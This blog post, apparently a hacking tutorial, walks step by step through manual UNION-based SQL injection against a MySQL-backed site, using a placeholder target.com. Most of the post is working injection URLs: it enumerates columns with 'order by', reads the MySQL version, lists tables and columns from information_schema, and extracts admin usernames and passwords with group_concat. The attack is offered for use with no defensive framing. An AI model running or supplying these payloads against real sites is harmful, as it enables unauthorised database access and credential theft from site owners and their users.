MY SQL Database Manual SQL Injection Tutorail
Hello guys, hope you all are doing great. Today i will explain manual SQL Injection on MYSQL database. Requirement for this is only a sqli vulnerable site and some patience. For this tutorial, we’ll be using “http://www.target.com” as an example.
Lets get started..
[#] Find The Number Of Columns
First step is to find the number of column it has. Add "order by 1--" (without quotes) to the end of url
Example:
http://target.com/news.php?id=76 order by 1--
Then Increment the 1 until you get an error saying "unknown column"
Example:
http://target.com/news.php?id=76 order by 1-- NO ERROR
http://target.com/news.php?id=76 order by 2-- NO ERROR
http://target.com/news.php?id=76 order by 3-- NO ERROR
http://target.com/news.php?id=76 order by 4-- NO ERROR
we have got error at 5 it means there are 4 cloumns.
[#] Finding Vulnerable Columns
Now that we found the number of columns, time to find the vulnerable column using "union select" statement. First remove all queries we have added. Now null the parameter by adding "-" (without quotes) before the number.
Example:
In our first step we have found there are 4 columns so our query will be.
Example:
Now you will get some numbers on screen choose any For example we will take 3
[#] Finding Version
Now we know the vulnerable column which is 3 in our example, time to check which version of MYSQL is running we have to check this because SQL injecting version 4 and 5 is different. Alright now replace 3 with "version()"
Example:
http://www.target.com/index.php?id=-2 union select 1,2,version(),4--
Now It will show the MYSQL version something like this 5.1.52-log.
[#] Finding the Table Name
Now we have to find the table names it has. If the version you have got is 4.x.x then you have to pretty much guess everything. With MYSQL 5 came information_schema which stores tables and column names and group_concat() for getting every information at once, making our job a lot easier. I will be explaining MYSQL 5, Replace the 3 with "group_concat(table_name)" and "from information_schema.tables where table_schema=database()--" to the end
Examle:
http://www.target.com/index.php?id=-2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
Now it will show the list of all table names in database. Choose any table name you wish. in our example we will take "admin".
[#] Finding the Column Name
Now replace the "group_concat(table_name) with "group_concat(column_name)" and replace the "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=0x41646d696e--"
Example:
http://www.target.com/index.php?id=-2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e--
if you have noticed you might be wondering whats this "0x41646d696e" First of all these are called hex. 41646d696e is the hex value of "admin" which is our table name in example and 0x to make hex readable. We will have to convert the table name to hex in order to retrieve info. For converting text to hex visit this website
http://www.swingnote.com/tools/texttohex.php
ok now we will have the column names.
[#] Final Data Extraction
Say for instance we have got the following columns username, password Replace "group_concat(table_name)" with "group_concat(username,0x3a,password)" and "from information_schema.columns where table_name=0x41646d696e-- with "from admin
Example:
www.target.com/news.php?id=-76+union+select +1,2,group_concat (username,0x3a,password),4+from+admin
0x3a is hex value of : its just for seperation of result.
Now finally we can see the data :D
Thats all guys!
Stay safe and gud luck!
0 comments:
Post a Comment